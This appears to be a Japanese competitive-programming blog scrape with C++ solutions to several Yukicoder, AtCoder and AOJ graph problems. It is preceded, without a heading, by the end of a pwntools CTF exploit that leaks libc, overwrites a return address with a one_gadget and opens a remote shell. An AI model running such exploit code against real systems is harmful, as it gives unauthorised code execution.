parser.add_argument('--libc', default='/lib/x86_64-linux-gnu/libc.so.6') # eea5f41864be6e7b95da2f33f3dec47f
args = parser.parse_args()
context.log_level = args.log_level
elf = ELF(args.binary)
libc = ELF(args.libc)
one_gadget = 0xf0567

# print the maze
h = 32
w = 32
letters = 'nswe'
delta = [ -32, +32, -1, +1 ]
walls = bytearray(elf.read(elf.symbols['walls'], h * w))
s = ''
for y in range(h):
    s0 = ''
    s1 = ''
    s2 = ''
    for x in range(w):
        room = y * w + x
        wall_n = bool(walls[room] & (1 << letters.index('n')))
        wall_s = bool(walls[room] & (1 << letters.index('s')))
        wall_w = bool(walls[room] & (1 << letters.index('w')))
        wall_e = bool(walls[room] & (1 << letters.index('e')))
        s0 += '#%c#' % '.#'[wall_n]
        s1 += '%c %c' % ('.#'[wall_e], '.#'[wall_w])
        s2 += '#%c#' % '.#'[wall_s]
    s += s0 + '\n'
    s += s1 + '\n'
    s += s2 + '\n'
log.info('maze:\n%s', s)

p = remote(args.host, args.port)
def read_prompt(flush=True):
    if flush:
        p.sendline()
    p.recvuntil('You are in room: ')
    room = int(p.recvline())
    p.recvuntil('Room contains: ')
    room_contains = int(p.recvuntil(' '))
    p.recvuntil('mate. You have: ')
    you_have = int(p.recvuntil(' '))
    p.recvuntil('mate.')
    log.info('room: %d', room)
    return room, room_contains, you_have
def move_for(c, take=False):
    _, room_contains, _ = read_prompt(flush=False)
    if take:
        p.sendline('take %d' % room_contains)
        read_prompt(flush=False)
    p.sendline(c)

# read libc base
for _ in range(34):
    move_for('w')
IO_fgets_173 = 0
_, room_contains, _ = read_prompt()
IO_fgets_173 += room_contains
move_for('w')
_, room_contains, _ = read_prompt()
IO_fgets_173 *= 0x10000
IO_fgets_173 += room_contains
move_for('w')
_, room_contains, _ = read_prompt()
IO_fgets_173 *= 0x10000
IO_fgets_173 += room_contains
for _ in range(34 + 2):
    move_for('e')
room, _, _ = read_prompt()
log.info('<_IO_fgets+173>: %#x', IO_fgets_173)
assert room == 0
libc_base = IO_fgets_173 - libc.symbols['_IO_fgets'] - 173
log.info('libc base: %#x', libc_base)

# goto 1023
def go(room, visited):
    visited[room] = True
    if room == 1023:
        return []
    for i in range(4):
        c = letters[i]
        if 0 <= room + delta[i] < h * w:
            if not (walls[room] & (1 << i)) and not visited[room + delta[i]]:
                result = go(room + delta[i], visited)
                if result is not None:
                    return result + [ letters[i] ]
result = go(0, [ False ] * (h * w))
for c in reversed(result):
    move_for(c, take=True)
room, room_contains, you_have = read_prompt()
assert room == 1023

# goto 1023 + 37 (return addr)
for _ in range(6):
    move_for('e')
move_for('s')
room, _, _ = read_prompt()
while room < 1023 + 37 + 32:
    move_for('e')
    moved_room, _, _ = read_prompt()
    assert room != moved_room
    room = moved_room
move_for('n')
room, room_contains, you_have = read_prompt()
assert room == 1023 + 37

# overwrite the return address
log.info('write: %#x', libc_base + one_gadget)
_, room_contains, _ = read_prompt(flush=False)
p.sendline('take %d' % room_contains)
read_prompt(flush=False)
p.sendline('drop %d' % ((libc_base + one_gadget) % 0x10000))
move_for('e')
_, room_contains, _ = read_prompt(flush=False)
p.sendline('take %d' % room_contains)
read_prompt(flush=False)
p.sendline('drop %d' % ((libc_base + one_gadget) / 0x10000 % 0x10000))
move_for('e')
_, room_contains, _ = read_prompt(flush=False)
p.sendline('take %d' % room_contains)
read_prompt(flush=False)
p.sendline('drop %d' % ((libc_base + one_gadget) / 0x10000 / 0x10000 % 0x10000))

# return to 1023
for _ in range(10):
    move_for('n')
    move_for('e')
room, _, _ = read_prompt()
result = go(room, [ False ] * (h * w))
for c in reversed(result):
    move_for(c, take=True)
room, _, _ = read_prompt()
assert room == 1023

# exit the main function
_, _, you_have = read_prompt()
p.sendline('drop %d' % (you_have - 31337))
p.recvuntil('flag.txt')

# shell
time.sleep(1)
p.sendline('id')
p.interactive()

Yukicoder No.529 帰省ラッシュ

,

http://yukicoder.me/problems/no/529

ライブラリ貼るだけというのは分かったが、肝心のライブラリがなかった。

solution

二重辺連結成分分解 + 重軽分解 + segment木。$O(N + M + Q ((\log N)^2 + \log Q))$。

二重辺連結成分分解すると連結成分の木ができる。 元のグラフ上でpath $S - T$と移動するとき、この木の上の(一意な)path $S - T$上の成分の含む元のグラフの頂点は全て自由に通れ、それ以外の頂点は通過できない。 つまり連結成分の木の上のクエリだと見做してよい。

木の上の道に関するクエリなので、重軽分解してsegment木で処理できる。 segment木の葉には連結成分の番号$i$とその連結成分$i$中の頂点の持つ価値の最大値$w_i$の対$(i, w_i)$を持たせる。 演算は$w_i$が大きい方を取る操作。 segment木とは別に、各連結成分$i$ごとにpriority queueを持たせ成分$i$中の価値の最大値$w_i$を取り出せるようにしておく。

implementation

合計で$343$行あるが、実質書いたのは下から$46$行だった。

#include <algorithm>
#include <cassert>
#include <climits>
#include <cmath>
#include <cstdio>
#include <functional>
#include <queue>
#include <stack>
#include <tuple>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define repeat_reverse(i, n) for (int i = (n)-1; (i) >= 0; --(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using namespace std;
template <class T> inline void setmax(T & a, T const & b) { a = max(a, b); }

/**
 * @brief 2-edge-connected components decomposition
 * @param g an adjacent list of the simple undirected graph
 * @note O(V + E)
 */
pair<int, vector<int> > decompose_to_two_edge_connected_components(vector<vector<int> > const & g) {
    int n = g.size();
    vector<int> imos(n); { // imos[i] == 0  iff  the edge i -> parent is a bridge
        vector<char> used(n); // 0: unused ; 1: exists on stack ; 2: removed from stack
        function<void (int, int)> go = [&](int i, int parent) {
            used[i] = 1;
            for (int j : g[i]) if (j != parent) {
                if (used[j] == 0) {
                    go(j, i);
                    imos[i] += imos[j];
                } else if (used[j] == 1) {
                    imos[i] += 1;
                    imos[j] -= 1;
                }
            }
            used[i] = 2;
        };
        repeat (i, n) if (used[i] == 0) {
            go(i, -1);
        }
    }
    int size = 0;
    vector<int> component_of(n, -1); {
        function<void (int)> go = [&](int i) {
            for (int j : g[i]) if (component_of[j] == -1) {
                component_of[j] = imos[j] == 0 ? size ++ : component_of[i];
                go(j);
            }
        };
        repeat (i, n) if (component_of[i] == -1) {
            component_of[i] = size ++;
            go(i);
        }
    }
    return { size, move(component_of) };
}
vector<vector<int> > decomposed_graph(int size, vector<int> const & component_of, vector<vector<int> > const & g) {
    int n = g.size();
    vector<vector<int> > h(size);
    repeat (i, n) for (int j : g[i]) {
        if (component_of[i] != component_of[j]) {
            h[component_of[i]].push_back(component_of[j]);
        }
    }
    repeat (k, size) {
        whole(sort, h[k]);
        h[k].erase(whole(unique, h[k]), h[k].end());
    }
    return h;
}

/**
 * @brief heavy light decomposition
 * @description for given rooted tree G = (V, E), decompose the vertices to disjoint paths, and construct new small rooted tree G' = (V', E') of the disjoint paths.
 * @see http://math314.hateblo.jp/entry/2014/06/24/220107
 */
struct heavy_light_decomposition {
    vector<vector<int> > path; // V' -> list of V, bottom to top order
    vector<int> path_of; // V -> V'
    vector<int> index_of; // V -> int: the index of the vertex in the path that belongs to
    vector<int> parent; // V' -> V
    heavy_light_decomposition(int root, vector<vector<int> > const & g) {
        int n = g.size();
        vector<int> tour_parent(n, -1);
        vector<int> euler_tour(n); {
            int i = 0;
            stack<int> stk;
            tour_parent[root] = -1;
            euler_tour[i ++] = root;
            stk.push(root);
            while (not stk.empty()) {
                int x = stk.top(); stk.pop();
                for (int y : g[x]) if (y != tour_parent[x]) {
                    tour_parent[y] = x;
                    euler_tour[i ++] = y;
                    stk.push(y);
                }
            }
        }
        path_of.resize(n);
        index_of.resize(n);
        vector<int> subtree_height(n);
        int path_count = 0;
        repeat_reverse (i, n) {
            int y = euler_tour[i];
            if (y != root) {
                int x = tour_parent[y];
                setmax(subtree_height[x], subtree_height[y] + 1);
            }
            if (subtree_height[y] == 0) {
                // make a new path
                path_of[y] = path_count ++;
                index_of[y] = 0;
                path.emplace_back();
                path.back().push_back(y);
                parent.push_back(tour_parent[y]);
            } else {
                // add to an existing path
                int i = -1;
                for (int z : g[y]) {
                    if (subtree_height[z] == subtree_height[y] - 1) {
                        i = path_of[z];
                        break;
                    }
                }
                assert (i != -1);
                path_of[y] = i;
                index_of[y] = path[i].size();
                path[i].push_back(y);
                parent[i] = tour_parent[y];
            }
        }
    }
};

/**
 * @brief lowest common ancestor with doubling
 */
struct lowest_common_ancestor {
    vector<vector<int> > a;
    vector<int> depth;
    lowest_common_ancestor() = default;
    /**
     * @note O(N \log N)
     * @param g an adjacent list of the tree
     */
    lowest_common_ancestor(int root, vector<vector<int> > const & g) {
        int n = g.size();
        int log_n = max<int>(1, ceil(log2(n)));
        a.resize(log_n, vector<int>(n, -1));
        depth.resize(n, -1);
        {
            auto & parent = a[0];
            stack<int> stk;
            depth[root] = 0;
            parent[root] = -1;
            stk.push(root);
            while (not stk.empty()) {
                int x = stk.top(); stk.pop();
                for (int y : g[x]) if (depth[y] == -1) {
                    depth[y] = depth[x] + 1;
                    parent[y] = x;
                    stk.push(y);
                }
            }
        }
        repeat (k, log_n-1) {
            repeat (i, n) {
                if (a[k][i] != -1) {
                    a[k+1][i] = a[k][a[k][i]];
                }
            }
        }
    }
    /**
     * @brief find the LCA of x and y
     * @note O(log N)
     */
    int operator () (int x, int y) const {
        int log_n = a.size();
        if (depth[x] < depth[y]) swap(x,y);
        repeat_reverse (k, log_n) {
            if (a[k][x] != -1 and depth[a[k][x]] >= depth[y]) {
                x = a[k][x];
            }
        }
        assert (depth[x] == depth[y]);
        assert (x != -1);
        if (x == y) return x;
        repeat_reverse (k, log_n) {
            if (a[k][x] != a[k][y]) {
                x = a[k][x];
                y = a[k][y];
            }
        }
        assert (x != y);
        assert (a[0][x] == a[0][y]);
        return a[0][x];
    }
    /**
     * @brief find the descendant of x for y
     */
    int descendant (int x, int y) const {
        assert (depth[x] < depth[y]);
        int log_n = a.size();
        repeat_reverse (k, log_n) {
            if (a[k][y] != -1 and depth[a[k][y]] >= depth[x]+1) {
                y = a[k][y];
            }
        }
        assert (a[0][y] == x);
        return y;
    }
};

template <typename SegmentTree>
struct heavy_light_decomposition_node_adapter {
    typedef typename SegmentTree::monoid_type CommutativeMonoid;
    typedef typename CommutativeMonoid::type underlying_type;

    vector<SegmentTree> segtree;
    heavy_light_decomposition & hl;
    lowest_common_ancestor & lca;
    CommutativeMonoid mon;
    heavy_light_decomposition_node_adapter(
            heavy_light_decomposition & a_hl,
            lowest_common_ancestor & a_lca,
            underlying_type initial_value = CommutativeMonoid().unit(),
            CommutativeMonoid const & a_mon = CommutativeMonoid())
            : hl(a_hl), lca(a_lca), mon(a_mon) {
        repeat (i, hl.path.size()) {
            segtree.emplace_back(hl.path[i].size(), initial_value, a_mon);
        }
    }

    void node_set(int x, underlying_type value) {
        int i = hl.path_of[x];
        int j = hl.index_of[x];
        segtree[i].point_set(j, value);
    }

    template <class Func>
    void path_do_something(int x, int y, Func func) {
        int z = lca(x, y);
        auto climb = [&](int & x) {
            while (hl.path_of[x] != hl.path_of[z]) {
                int i = hl.path_of[x];
                func(segtree[i], hl.index_of[x], hl.path[i].size());
                x = hl.parent[i];
            }
        };
        climb(x);
        climb(y);
        int i = hl.path_of[z];
        if (hl.index_of[x] > hl.index_of[y]) swap(x, y);
        func(segtree[i], hl.index_of[x], hl.index_of[y] + 1);
    }
    underlying_type path_concat(int x, int y) {
        underlying_type acc = mon.unit();
        path_do_something(x, y, [&](SegmentTree & segtree, int l, int r) {
            acc = mon.append(acc, segtree.range_concat(l, r));
        });
        return acc;
    }
};

template <class Monoid>
struct segment_tree {
    typedef Monoid monoid_type;
    typedef typename Monoid::type underlying_type;
    int n;
    vector<underlying_type> a;
    Monoid mon;
    segment_tree() = default;
    segment_tree(int a_n, underlying_type initial_value = Monoid().unit(), Monoid const & a_mon = Monoid()) : mon(a_mon) {
        n = 1; while (n < a_n) n *= 2;
        a.resize(2*n-1, mon.unit());
        fill(a.begin() + (n-1), a.begin() + (n-1 + a_n), initial_value); // set initial values
        repeat_reverse (i, n-1) a[i] = mon.append(a[2*i+1], a[2*i+2]); // propagate initial values
    }
    void point_set(int i, underlying_type z) { // 0-based
        a[i+n-1] = z;
        for (i = (i+n)/2; i > 0; i /= 2) { // 1-based
            a[i-1] = mon.append(a[2*i-1], a[2*i]);
        }
    }
    underlying_type range_concat(int l, int r) { // 0-based, [l, r)
        underlying_type lacc = mon.unit(), racc = mon.unit();
        for (l += n, r += n; l < r; l /= 2, r /= 2) { // 1-based loop, 2x faster than recursion
            if (l % 2 == 1) lacc = mon.append(lacc, a[(l ++) - 1]);
            if (r % 2 == 1) racc = mon.append(a[(-- r) - 1], racc);
        }
        return mon.append(lacc, racc);
    }
};

struct index_max_t {
    struct type { int index, value; };
    type unit() const { return { -1, INT_MIN }; }
    type append(type a, type b) { return a.value > b.value ? a : b; }
};
typedef index_max_t::type node_t;

int main() {
    int n, m, query; scanf("%d%d%d", &n, &m, &query);
    vector<vector<int> > g(n);
    repeat (i, m) {
        int a, b; scanf("%d%d", &a, &b); -- a; -- b;
        g[a].push_back(b);
        g[b].push_back(a);
    }
    int size; vector<int> component_of; tie(size, component_of) = decompose_to_two_edge_connected_components(g);
    vector<priority_queue<int> > que(size);
    vector<vector<int> > h = decomposed_graph(size, component_of, g);
    constexpr int root = 0;
    heavy_light_decomposition hl(root, h);
    lowest_common_ancestor lca(root, h);
    heavy_light_decomposition_node_adapter<segment_tree<index_max_t> > segtree(hl, lca);
    repeat (i, size) {
        segtree.node_set(i, (node_t) { i, -1 });
    }
    while (query --) {
        int type; scanf("%d", &type);
        if (type == 1) {
            int u, w; scanf("%d%d", &u, &w); -- u;
            int i = component_of[u];
            que[i].push(w);
            segtree.node_set(i, (node_t) { i, que[i].top() });
        } else if (type == 2) {
            int s, t; scanf("%d%d", &s, &t); -- s; -- t;
            auto result = segtree.path_concat(component_of[s], component_of[t]);
            int i = result.index;
            if (not que[i].empty()) {
                que[i].pop();
                int w = que[i].empty() ? -1 : que[i].top();
                segtree.node_set(i, (node_t) { i, w });
            }
            printf("%d\n", result.value);
        }
    }
    return 0;
}

AtCoder Regular Contest 039: D - 旅行会社高橋君

,

http://arc039.contest.atcoder.jp/tasks/arc039_d

solution

二重辺連結成分分解。最小共通祖先。$O(N \log N + M)$。

与えられたグラフが$2$-辺連結なら全ての答えはOK。 そうでないとき、つまり橋が存在するときが問題。 そこで二重辺連結成分分解をする。

クエリ$(A, B, C)$への答えは、分解された成分による$C$上におけるpath $A - C$上に$B$が存在するときちょうどOKとなる。

頂点$x \vee y = \mathrm{lca}(x, y)$を頂点$x, y$の最小共通祖先とすると、これは半束をなす。 通常の半順序を入れる、つまり$x \le y \iff x \vee y = y$とする。 このときpath $x - z$ 上に頂点$y$が存在するとは、

  • $x \le z$のとき
    • $x \le y \land y \le z$
  • $z \le x$のとき
    • $z \le y \land y \le x$
  • それ以外のとき
    • $(x \le y \lor z \le y) \land y \le x \vee z$

implementation

#include <algorithm>
#include <cassert>
#include <climits>
#include <cmath>
#include <cstdio>
#include <functional>
#include <stack>
#include <tuple>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define repeat_reverse(i, n) for (int i = (n)-1; (i) >= 0; --(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using namespace std;

/**
 * @brief 2-edge-connected components decomposition
 * @param g an adjacent list of the simple undirected graph
 * @note O(V + E)
 */
pair<int, vector<int> > decompose_to_two_edge_connected_components(vector<vector<int> > const & g) {
    int n = g.size();
    vector<int> imos(n); { // imos[i] == 0  iff  the edge i -> parent is a bridge
        vector<char> used(n);
        function<void (int, int)> go = [&](int i, int parent) {
            used[i] = 1;
            for (int j : g[i]) if (j != parent) {
                if (used[j] == 0) {
                    go(j, i);
                    imos[i] += imos[j];
                } else if (used[j] == 1) {
                    imos[i] += 1;
                    imos[j] -= 1;
                }
            }
            used[i] = 2;
        };
        repeat (i, n) if (used[i] == 0) {
            go(i, -1);
        }
    }
    int size = 0;
    vector<int> component_of(n, -1); {
        function<void (int)> go = [&](int i) {
            for (int j : g[i]) if (component_of[j] == -1) {
                component_of[j] = imos[j] == 0 ? size ++ : component_of[i];
                go(j);
            }
        };
        repeat (i, n) if (component_of[i] == -1) {
            component_of[i] = size ++;
            go(i);
        }
    }
    return { size, move(component_of) };
}
vector<vector<int> > decomposed_graph(int size, vector<int> const & component_of, vector<vector<int> > const & g) {
    int n = g.size();
    vector<vector<int> > h(size);
    repeat (i, n) for (int j : g[i]) {
        if (component_of[i] != component_of[j]) {
            h[component_of[i]].push_back(component_of[j]);
        }
    }
    repeat (k, size) {
        whole(sort, h[k]);
        h[k].erase(whole(unique, h[k]), h[k].end());
    }
    return h;
}

/**
 * @brief lowest common ancestor with doubling
 */
struct lowest_common_ancestor {
    vector<vector<int> > a;
    vector<int> depth;
    lowest_common_ancestor() = default;
    /**
     * @note O(N \log N)
     * @param g an adjacent list of the tree
     */
    lowest_common_ancestor(int root, vector<vector<int> > const & g) {
        int n = g.size();
        int log_n = max<int>(1, ceil(log2(n)));
        a.resize(log_n, vector<int>(n, -1));
        depth.resize(n, -1);
        {
            auto & parent = a[0];
            stack<int> stk;
            depth[root] = 0;
            parent[root] = -1;
            stk.push(root);
            while (not stk.empty()) {
                int x = stk.top(); stk.pop();
                for (int y : g[x]) if (depth[y] == -1) {
                    depth[y] = depth[x] + 1;
                    parent[y] = x;
                    stk.push(y);
                }
            }
        }
        repeat (k, log_n-1) {
            repeat (i, n) {
                if (a[k][i] != -1) {
                    a[k+1][i] = a[k][a[k][i]];
                }
            }
        }
    }
    /**
     * @brief find the LCA of x and y
     * @note O(log N)
     */
    int operator () (int x, int y) const {
        int log_n = a.size();
        if (depth[x] < depth[y]) swap(x,y);
        repeat_reverse (k, log_n) {
            if (a[k][x] != -1 and depth[a[k][x]] >= depth[y]) {
                x = a[k][x];
            }
        }
        assert (depth[x] == depth[y]);
        assert (x != -1);
        if (x == y) return x;
        repeat_reverse (k, log_n) {
            if (a[k][x] != a[k][y]) {
                x = a[k][x];
                y = a[k][y];
            }
        }
        assert (x != y);
        assert (a[0][x] == a[0][y]);
        return a[0][x];
    }
    /**
     * @brief find the descendant of x for y
     */
    int descendant (int x, int y) const {
        assert (depth[x] < depth[y]);
        int log_n = a.size();
        repeat_reverse (k, log_n) {
            if (a[k][y] != -1 and depth[a[k][y]] >= depth[x]+1) {
                y = a[k][y];
            }
        }
        assert (a[0][y] == x);
        return y;
    }
};

int main() {
    int n, m; scanf("%d%d", &n, &m);
    vector<vector<int> > g(n); // connected
    repeat (i, m) {
        int x, y; scanf("%d%d", &x, &y); -- x; -- y;
        g[x].push_back(y);
        g[y].push_back(x);
    }
    int size; vector<int> component_of; tie(size, component_of) = decompose_to_two_edge_connected_components(g);
    vector<vector<int> > h = decomposed_graph(size, component_of, g); // tree
    lowest_common_ancestor lca(0, h);
    int query; scanf("%d", &query);
    while (query --) {
        int a, b, c; scanf("%d%d%d", &a, &b, &c); -- a; -- b; -- c;
        int x = component_of[a];
        int y = component_of[b];
        int z = component_of[c];
        bool result;
        if (lca(x, z) == z) {
            result = lca(x, y) == y and lca(y, z) == z;
        } else if (lca(x, z) == x) {
            result = lca(z, y) == y and lca(y, x) == x;
        } else {
            result = (lca(x, y) == y and lca(z, y) == lca(x, z))
                  or (lca(x, y) == lca(x, z) and lca(z, y) == y);
        }
        printf("%s\n", result ? "OK" : "NG");
    }
    return 0;
}

Yukicoder No.528 10^9と10^9+7と回文

,

http://yukicoder.me/problems/no/528

典型感があったが苦手感もあった。

solution

$O(\log_{10} N)$で普通にやる。法が$10^9$と$10^9+7$とふたつあるが両方同じ。

与えられた$N$は$10$進$k$桁とする。 桁数や$N$との一致の数を順に試していく。 特に、対象となる回文数を以下のように場合分けする:

  • 桁数が$k$未満
    • 先頭に$0$が使えないことを除いて普通に
  • 桁数が$k$で$k$桁目の数字が$N$のそれ未満
    • 先頭に$0$が使えないかつ先頭が$N$のそれ未満
  • 桁数が$k$で$k$桁目の数字が$N$のそれと同じで$\lceil \frac{k}{2} \rceil$桁目の数字が$N$のそれ未満
    • 先頭が$0$かどうか気にしなくてよいが$N$の数字未満というのは見る必要がある
  • 桁数が$k$で$k$桁目の数字が$N$のそれと同じで$\lceil \frac{k}{2} \rceil$桁目の数字が$N$のそれと同じ
    • 最大まで$N$と一致させる場合。$N$を越えてしまう場合があるのでその確認が必要

implementation

#include <iostream>
#include <string>
#include <algorithm>
#include <cassert>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define repeat_reverse(i, n) for (int i = (n)-1; (i) >= 0; --(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using ll = long long;
using namespace std;

ll powmod(ll x, ll y, ll p) { // O(log y)
    assert (0 <= x and x < p);
    assert (0 <= y);
    ll z = 1;
    for (ll i = 1; i <= y; i <<= 1) {
        if (y & i) z = z * x % p;
        x = x * x % p;
    }
    return z;
}

constexpr int mod1 = 1e9;
constexpr int mod2 = 1e9+7;
int main() {
    string s; cin >> s;
    whole(reverse, s);
    int n = s.length();
    ll acc1 = 0;
    ll acc2 = 0;
    repeat (i, n-1) {
        acc1 += 9 *(ll) powmod(10, i/2, mod1);
        acc2 += 9 *(ll) powmod(10, i/2, mod2);
    }
    if (n == 1) {
        acc1 += s[0] - '0';
        acc2 += s[0] - '0';
    } else if (n == 2) {
        acc1 += min(s[0], s[1]) - '0';
        acc2 += min(s[0], s[1]) - '0';
    } else {
        acc1 += (s[n-1] - '1') * (ll) powmod(10, (n-1)/2, mod1) % mod1;
        acc2 += (s[n-1] - '1') * (ll) powmod(10, (n-1)/2, mod2) % mod2;
        for (int i = n-2; i > n/2; -- i) {
            acc1 += (s[i] - '0') *(ll) powmod(10, i-n/2, mod1) % mod1;
            acc2 += (s[i] - '0') *(ll) powmod(10, i-n/2, mod2) % mod2;
        }
        int i = n/2;
        assert (i != n-1);
        bool correction = false;
        if (n % 2 == 0) {
            repeat (di, n/2) {
                if (s[i+di] > s[i-di-1]) {
                    correction = true;
                    break;
                } else if (s[i+di] < s[i-di-1]) {
                    break;
                }
            }
        } else {
            repeat (di, n/2+1) {
                if (s[i+di] > s[i-di]) {
                    correction = true;
                    break;
                } else if (s[i+di] < s[i-di]) {
                    break;
                }
            }
        }
        acc1 += s[i] - '0' + 1 - int(correction);
        acc2 += s[i] - '0' + 1 - int(correction);
    }
    acc1 %= mod1;
    acc2 %= mod2;
    if (acc1 < 0) acc1 += mod1;
    if (acc2 < 0) acc2 += mod2;
    printf("%lld\n", acc1);
    printf("%lld\n", acc2);
    return 0;
}

AOJ 2222: Alien's Counting

,

http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=2222

Any finger appears at most once in S.

を読み落としていてひたすら悩んでいた。

solution

強連結成分分解。でてくるDAGは特に木のようになっているので根から再帰的にやる。$O(N + M \log M)$。

implementation

#include <cstdio>
#include <vector>
#include <algorithm>
#include <tuple>
#include <functional>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using ll = long long;
using namespace std;

vector<vector<int> > opposite_graph(vector<vector<int> > const & g) {
    int n = g.size();
    vector<vector<int> > h(n);
    repeat (i, n) for (int j : g[i]) h[j].push_back(i);
    return h;
}
pair<int, vector<int> > decompose_to_strongly_connected_components(vector<vector<int> > const & g, vector<vector<int> > const & g_rev) {
    int n = g.size();
    vector<int> acc(n); {
        vector<bool> used(n);
        function<void (int)> dfs = [&](int i) {
            used[i] = true;
            for (int j : g[i]) if (not used[j]) dfs(j);
            acc.push_back(i);
        };
        repeat (i,n) if (not used[i]) dfs(i);
        whole(reverse, acc);
    }
    int size = 0;
    vector<int> component_of(n); {
        vector<bool> used(n);
        function<void (int)> rdfs = [&](int i) {
            used[i] = true;
            component_of[i] = size;
            for (int j : g_rev[i]) if (not used[j]) rdfs(j);
        };
        for (int i : acc) if (not used[i]) {
            rdfs(i);
            ++ size;
        }
    }
    return { size, move(component_of) };
}
vector<vector<int> > decomposed_graph(int size, vector<int> const & component_of, vector<vector<int> > const & g) {
    int n = g.size();
    vector<vector<int> > h(size);
    repeat (i, n) for (int j : g[i]) {
        if (component_of[i] != component_of[j]) {
            h[component_of[i]].push_back(component_of[j]);
        }
    }
    repeat (k, size) {
        whole(sort, h[k]);
        h[k].erase(whole(unique, h[k]), h[k].end());
    }
    return h;
}

constexpr int mod = 1e9+7;
int main() {
    int n, m; scanf("%d%d", &n, &m);
    vector<vector<int> > g(n);
    repeat (i, m) {
        int s, d; scanf("%d%d", &s, &d); -- s; -- d;
        g[s].push_back(d);
    }
    int size; vector<int> component_of; tie(size, component_of) = decompose_to_strongly_connected_components(g, opposite_graph(g));
    vector<vector<int> > h = decomposed_graph(size, component_of, g);
    vector<vector<int> > h_rev = opposite_graph(h);
    int result = 1;
    function<int (int)> go = [&](int i) {
        int acc = 1;
        for (int j : h_rev[i]) {
            acc = acc *(ll) go(j) % mod;
        }
        return acc + 1;
    };
    repeat (i, size) {
        if (h[i].empty()) {
            result = result *(ll) go(i) % mod;
        }
    }
    printf("%d\n", result);
    return 0;
}